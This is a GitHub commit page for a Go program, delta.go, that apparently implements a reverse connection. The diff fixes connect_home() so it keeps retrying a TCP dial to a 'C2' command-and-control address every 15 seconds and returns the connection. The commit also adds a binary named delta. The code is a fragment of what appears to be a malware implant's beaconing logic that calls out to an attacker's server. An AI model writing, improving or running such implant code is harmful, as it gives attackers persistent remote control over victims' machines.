Skip to content

Commit

Permalink
Implemented consistency in the reverse connection
Browse files Browse the repository at this point in the history
  • Loading branch information
nemzyxt committed Nov 17, 2022
1 parent c449329 commit 43cf733
Show file tree
Hide file tree
Showing 2 changed files with 1 addition and 1 deletion.
Binary file added delta
Binary file not shown.
2 changes: 1 addition & 1 deletion delta.go
Original file line number Diff line number Diff line change
Expand Up @@ -157,7 +157,7 @@ func connect_home() (net.Conn, error) {
conn, err := net.Dial("tcp", C2)
if err != nil {
time.Sleep(15e9)
connect_home()
return connect_home()
}
return conn, err
}
Expand Down

0 comments on commit 43cf733

Please sign in to comment.